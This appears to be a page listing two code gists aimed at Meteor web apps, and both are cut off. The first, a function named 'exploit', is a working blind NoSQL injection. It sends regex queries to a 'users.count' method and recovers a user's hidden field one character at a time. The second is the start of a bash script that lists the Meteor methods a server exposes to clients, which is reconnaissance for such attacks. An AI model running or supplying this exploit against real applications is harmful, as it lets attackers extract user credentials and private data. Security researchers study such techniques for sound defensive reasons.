View meteor-regex-blind-nosql.js
(function exploit(user, field, alphabet, data = '', index = 0) { | |
Meteor.call('users.count', {username: user, [field] : {$regex: '^' + data + alphabet[index] + '.*'}}, (err, res) => { | |
console.log('^' + data + alphabet[index] + '.*', res); | |
if (res == 0) { | |
index++; | |
} else { | |
data += alphabet[index]; | |
index = 0; | |
} | |
if (index >= alphabet.length) { |
View meteor-methods.sh
#!/bin/bash | |
# A crude script to extract Meteor methods exposed to the client. | |
# | |
# Be sure to have npm and js-beautify installed. | |
# - $ npm install -g js-beautify | |
# | |
# Tested on: | |
# - GNU bash, version 4.4.19(1)-release (x86_64-pc-linux-gnu) | |
# - Meteor 1.8.1 |